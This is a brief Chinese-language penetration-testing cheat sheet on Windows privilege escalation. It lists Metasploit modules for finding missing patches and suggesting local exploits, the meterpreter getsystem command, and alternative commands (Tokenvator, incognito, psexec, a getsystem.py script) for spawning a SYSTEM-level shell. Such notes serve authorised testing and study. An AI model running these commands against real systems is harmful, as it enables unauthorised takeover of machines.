# MSF

```
发现补丁
>use post/windows/gather/enum_patches
列举可用EXP
>use post/multi/recon/local_exploit_suggester
```

**getsystem**

```
meterpreter> getsystem 
```

**getsystem替代者**

```
>Tokenvator.exe getsystem cmd.exe 
>incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe 
>psexec -s -i cmd.exe 
>python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc
```